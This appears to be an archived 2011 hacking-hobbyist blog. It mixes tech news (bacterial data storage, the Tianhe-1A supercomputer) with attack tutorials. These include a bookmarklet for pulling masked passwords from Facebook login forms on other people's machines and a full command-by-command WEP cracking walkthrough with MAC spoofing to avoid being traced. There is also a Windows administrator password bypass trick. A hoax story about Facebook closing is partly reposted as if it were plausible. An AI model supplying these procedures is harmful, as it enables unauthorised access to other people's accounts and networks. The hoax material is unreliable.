Saturday, January 15, 2011

View Password Behind Asterik [in facebook]. . .

Only can gain access if thre is other account loggged out and the password is in the form of asterik. . .

 At Address bar paste the following code...

javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var
w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g +
' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return
b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is
blank')}return true;}}

ENJOY.

Wednesday, January 12, 2011

How to Hack Wifi or Wireless Password

STEPS TO HACK WIFI OR WIRELESS PASSWORD

1. Get the Backtrack-Linux CD. Backtrack Linux Live CD(best Linux available for hackers with more than 2000 hacking tools inbuilt).
Download Backtrack Linux Live CD from here: CLICK HERE
 
2.  SCAN TO GET THE VICTIM

Get the victim to attack that is whose password you want to hack or crack.
Now Enter the Backtrack Linux CD into your CD drive and start it. Once its started click on the black box in the lower left corner to load up a "KONSOLE" . Now you should start your Wifi card. To do it so type 

airmon-ng

You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card. Now type

airmon-ng stop ath0

then type:

ifconfig wifi0 down

then type:

macchanger --mac 00:11:22:33:44:55 wifi0

then type:

airmon-ng start wifi0

The above steps i have explained is to spoof yourself from being traced. In above step we are spoofing our MAC address, this will keep us undiscovered.

Now type:

airodump-ng ath0

All above steps in one screen shot:
Now you will see a list of wireless networks in the Konsole. Some will have a better signal than others and its always a good idea to pick one that has a best signal strength otherwise it will take huge time to crack or hack the password or you may not be able to crack it at all.
Once you see the networks list, now select the network you want to hack. To freeze the airodump screen HOLD the CNTRL key and Press C.
Now you will see something like this:
 
 
 
3.  SELECTING NETWORK FOR HACKING 

Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.
 
  
Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --

00:23:69:bb:2d:of

The Channel number will be under a heading that says "CH".
As shown in this figure:
 
 
 
Now in the same KONSOLE window type:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0


The file name can be whatever you want. This file is the place where airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "Ben" because I can always remember it. Its simply because i love ben10....hhahahahaha :D

Note: If you want to crack more than one network in the same session, you must have different file names for each one or it won't work. I usually name them as ben1, ben2 etc.

Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in general terms all this means is "packets of info that contain characters of the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password. More difficult is password more packets you will need to crack it.




4.  Cracking the WEP password

Now leave this Konsole window up and running and open up a 2nd Konsole window.
In this window type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

This will send some commands to the router that basically it is to associate your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association Successful :-)" 
If this happens, then good! You are almost there.

Now type:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.

Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. 
Now type:
aircrack-ng -b (bssid) (filename)-01.cap

Remember the file name you made up earlier? Mine was "Ben". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000." 
DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.

If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.

Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:
se:cr:et

This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as:
0F:KW:94:27:VF



Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!

It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network.
 
VDO to easily crack WEP...

 <This GROUP is for Educational Purposes ONLY !>
<Spread the word, information is free>
<*Welcome 2 U ALL FRM MY SIDE*
*HACKERS R KNOWN AS DANGEROUS:
"THEIR only goal is the Knowledge,
and because the Knowledge is the Power,
THEY are considered as dangerous."-deadbj

SRC : http://www.isoftdl.com/http://www.isoftdl.com/

Monday, January 10, 2011

BACTERIA WORK AS HARD DRIVES...


BACTERIA WORK AS HARD DRIVES...


Scientists have found a way to store, encrypt and retrieve complex data in the DNA of E. coli.


Mon Jan 10, 2011 01:00 AM ET 
Content provided by AFP/Judith Evans

THE GIST
  • A group of students at Hong Kong's Chinese University have developed a way to store complex information in bacteria.
  • This opens up a way to saving text, images, music, and even video within living cells.
  • One gram of bacteria could store the same amount of information as 450 2,000-gigabyte hard disks.


A group of students at Hong Kong's Chinese University are making strides towards storing such vast amounts of information in an unexpected home: the E. coli bacterium better known as a potential source of serious food poisoning.

"This means you will be able to keep large datasets for the long term in a box of bacteria in the refrigerator," said Aldrin Yim, a student instructor on the university's biostorage project, a 2010 gold medallist in the Massachusetts Institute of Technology prestigious iGEMcompetition.
Biostorage -- the art of storing and encrypting information in living organisms -- is a young field, having existed for about a decade.
In 2007, a team at Japan's Keio University said they had successfully encoded the equation that represents Einstein's theory of relativity, E=MC², in the DNA of a common soil bacterium.
They pointed out that because bacteria constantly reproduce, a group of the single-celled organisms could store a piece of information for thousands of years.
But the Hong Kong researchers have leaped beyond this early step, developing methods to store more complex data and starting to overcome practical problems which have lent weight to skeptics who see the method as science fiction.
The group has developed a method of compressing data, splitting it into chunks and distributing it between different bacterial cells, which helps to overcome limits on storage capacity. They are also able to "map" the DNA so information can be easily located.
This opens up the way to storing not only text, but images, music, and even video within cells.
As a storage method it is extremely compact -- because each cell is minuscule, the group says that one gram of bacteria could store the same amount of information as 450 2,000-gigabyte hard disks.
They have also developed a three-tier security fence to encode the data, which may come as welcome news to U.S. diplomats, who have seen their thoughts splashed over the Internet thanks to WikiLeaks.
"Bacteria can't be hacked," points out Allen Yu, another student instructor.
"All kinds of computers are vulnerable to electrical failures or data theft. But bacteria are immune from cyber attacks. You can safeguard the information."
The team have even coined a word for this field -- biocryptography -- and the encoding mechanism contains built-in checks to ensure that mutations in some bacterial cells do not corrupt the data as a whole.
Professor Chan Ting Fung, who supervised the student team, told AFP that practical work in the field -- fostered by MIT, who have helped develop standards enabling researchers to collaborate -- was in its early stages.
But he said: "What the students did was to try it out and make sure some of the fundamental principles are actually achievable."
The Hong Kong group's work may have a more immediate application.
The techniques they use -- removing DNA from bacterial cells, manipulating them using enzymes and returning them to a new cell -- are similar to those used to create genetically modified foods.
But rather than changing the building blocks of an organism, the Hong Kong group allows extra information to piggyback on the DNA of the cell, after checking their changes against a master database to make sure they do not have accidental toxic effects.
Their work could enable extra information to be added to a genetically modified crop in the form of a "bio barcode", Chan said.
"For example, a company that makes a GM tomato that grows extra large with a gene that promotes growth -- on top of that we can actually encode additional information like safety protocols, things that are not directly related to the biological system."
Other types of information, like copyright and design history, could help to monitor the spread of GM crops, he said.
"It's kind of a safety net for synthetic organisms," said Wong Kit Ying, from the student team.
Beyond this, Chan and the students are evangelical about the future possibilities of synthetic biology.
"The field is getting popular because of the energy crisis, environmental pollution, climate change. They are thinking that a biological system will be a future solution to those -- as alternative energy sources, as a remedy for pollution. For these, micro-organisms are the obvious choice," Chan said.
One type of bacterium, Deinococcus radiodurans, can even survive nuclear radiation.
"Bacteria are everywhere: they can survive on things that are unthinkable to humans. So we can make use of this," Chan said.
So is it possible that a home computer could one day consist of a dish filled with micro-organisms?
The group dismisses concerns that this could be dangerous, pointing out that despite E. coli's poor reputation, they use an altered form that cannot exist outside a rich synthetic medium.
In fact, says Chan, while safety rules are strict, more measures are taken to protect the bacteria from contamination than to protect the researchers from the bacteria.
However, Yim admitted that while the group's work is a "foundational advance", a Petri dish PC is not likely to be on the market in the coming years, not least because the method of retrieving the data requires experts in a laboratory.
"It's possible," he said, "but there's a long way to go."

Sunday, January 9, 2011

News on Facebook Ending was a HoaX.-maRk


Facebook will NOT end on March 15th. Hoax news story spreads like wildfire


Heard a story that Facebook is going to end on March 15th? You should take it with a pinch of salt.
A story is spreading like wildfire across Facebook this weekend, claiming that the world's most popular social network is closing on March 15th.
The reason? CEO Mark Zuckerberg claims that "managing [Facebook] has ruined my life. I need to put an end to all the madness." 

FACEBOOK WILL END ON MARCH 15th!

FACEBOOK WILL END ON MARCH 15th!
'PuncH to TheWeB HistorY...'- BIJAY

"REASON MAYBE ANYTHING BUT CLOSING FB WILL BE A MUCH DISABLENESS TO MUCH AND MORE. LET'S HOPE SOMONE ELSE WILL TAKE THE LEADERSHIP AND GIVES THE CONTINUATION TO FB.
HOPE SO"-BIJAY ACHARYA<SHENANIGANS-NEPAL.BLOGSPOT.COM>

Reason of EndiNg FB maY be:
1>mark got better placement
2>may be hackers cause
3>may be googleme shock.
4>may be facebook is misused
5>may be he is afraid of being going his status down after this success.

 PALO ALTO, CA –Mark Zuckerberg announced that Facebook will be shut down in March. Managing the site has become too stressful.
“Facebook has gotten out of control,” said Zuckerberg in a press conference outside his Palo Alto office, “and the stress of managing this company has ruined my life. I need to put an end to all the madness.”
Zuckerberg went on to explain that starting March 15th, users will no longer be able to access their Facebook accounts.
“After March 15th the whole website shuts down,” said Avrat Humarthi, Vice President of Technical Affairs at Facebook. “So if you ever want to see your pictures again, I recommend you take them off the internet. You won’t be able to get them back once Facebook goes out of business.”
Zuckerberg said that the decision to shut down Facebook was difficult, but that he does not think people will be upset.
“I personally don’t think it’s a big deal,” he said in a private phone interview. “And to be honest, I think it’s for the better. Without Facebook, people will have to go outside and make real friends. That’s always a good thing.”
Some Facebook users were furious upon hearing the shocking news.
“What am I going to do without Facebook?” said Denise Bradshaw, a high school student from Indiana. “My life revolves around it. I’m on Facebook at least 10 hours a day. Now what am I going to do with all that free time?”
However, parents across the country have been experiencing a long anticipated sense of relief.
“I’m glad the Facebook nightmare is over,” said Jon Guttari, a single parent from Detroit. “Now my teenager’s face won’t be glued to a computer screen all day. Maybe I can even have a conversation with her.”
Those in the financial circuit are criticizing Zuckerberg for walking away from a multibillion dollar franchise. Facebook is currently ranked as one of the wealthiest businesses in the world, with economists estimating its value at around 7.9 billion.
But Zuckerberg remains unruffled by these accusations. He says he will stand by his decision to give Facebook the axe.
“I don’t care about the money,” said Zuckerberg. “I just want my old life back.”
The Facebook Corporation suggests that users remove all of their personal information from the website before March 15th. After that date, all photos, notes, links, and videos will be permanently erased.

 "REASON MAYBE ANYTHING BUT CLOSING FB WILL BE A MUCH DISABLENESS TO MUCH AND MORE. LET'S HOPE SOMONE ELSE WILL TAKE THE LEADERSHIP AND GIVES THE CONTINUATION TO FB.
HOPE SO"-BIJAY ACHARYA<SHENANIGANS-NEPAL.BLOGSPOT.COM>

news was published in http://weeklyworldnews.com/headlines/27321/facebook-will-end-on-march-15th/  on saturday.

Saturday, January 8, 2011

Forgot the Administrator Password-unlOck WitH tHis

DOWNLOAD IT HERE
If you're not 'techie' or are short on time, our team always recommends Stellar Phoenix Password Recovery. This tool automatically makes you the ultimate startup CD for resetting any Windows password.

It's also loaded with a ton of other recovery tools IT techs use daily.

-Petri IT Knowledgebase Team
Forgot the Administrator password - Alternate Method - The LOGON.SCR trick
This is another trick that will easily work in Windows NT 4.0 and some versions of Windows 2000. The principal is that you need to install a second instance of your OS to your HD, then manipulate the default screen saver (the one that's used if you don't move your mouse while the CTRL-ALT-DEL box appears) for the original OS.

How to lock drive in windows ?

STEPS TO LOCK DRIVE IN WINDOWS:
1. Go to Start menu and then to RUN  and type "gpedit.msc" (without quotes) and Press Enter.
2. Now you will see a new dialog window , where you will see two things "Computer Configuration" and "User Configuration". Now click on "User Configuration".
3. There you will see three items. Now you have to Click on "Administrative Templates". Then go to "Windows Components".
4. There you will see a lot of Windows Components. Now Click on " Windows Explorer"

5. Now you will find something like this "Prevent Access To Drives From My Computers" , double click on it . It will open its properties. Now to lock a drive or drives click on "Enabled" radio button. Now from the drop down menu select the drive that you want to lock or block.
6. After that click on apply and restart your system. Now anyone will not been able to access the particular drive.
7. To unlock the drive again follow the similar procedure and just click on "Not configured" and apply the settings and restart your system.

FULL Procedure is in this snapshot...
 
 

Monday, January 3, 2011

China built world's fastest super computer named Tianhe-1A

Tianhe-1A, a new supercomputer revealed today at HPC 2010 China, has set a new performance record of 2.507 petaflops, as measured by the LINPACK benchmark, making it the fastest system in China and in the world today(1)

Tianhe-1A epitomizes modern heterogeneous computing by coupling massively parallel GPUs with multi-core CPUs, enabling significant achievements in performance, size and power. The system uses 7,168 NVIDIA® Tesla™ M2050 GPUs and 14,336 CPUs; it would require more than 50,000 CPUs and twice as much floor space to deliver the same performance using CPUs alone.

More importantly, a 2.507 petaflop system built entirely with CPUs would consume more than 12 megawatts. Thanks to the use of GPUs in a heterogeneous computing environment, Tianhe-1A consumes only 4.04 megawatts, making it 3 times more power efficient -- the difference in power consumption is enough to provide electricity to over 5000 homes for a year.

Tianhe-1A was designed by the National University of Defense Technology (NUDT) in China. The system is housed at National Supercomputer Center in Tianjin and is already fully operational.

"The performance and efficiency of Tianhe-1A was simply not possible without GPUs," said Guangming Liu, chief of National Supercomputer Center in Tianjin. "The scientific research that is now possible with a system of this scale is almost without limits; we could not be more pleased with the results."

The Tianhe-1A supercomputer will be operated as an open access system to use for large scale scientific computations.

"GPUs are redefining high performance computing," said Jen-Hsun Huang, president and CEO of NVIDIA. "With the Tianhe-1A, GPUs now power two of the top three fastest computers in the world today. These GPU supercomputers are essential tools for scientists looking to turbocharge their rate of discovery."

NVIDIA Tesla GPUs, based on the CUDA™ parallel computing architecture, are designed specifically for high performance computing (HPC) environments and deliver transformative performance increases across a wide range of HPC fields, including drug discovery, hurricane and tsunami modeling, cancer research, car design, even studying the formation of galaxies.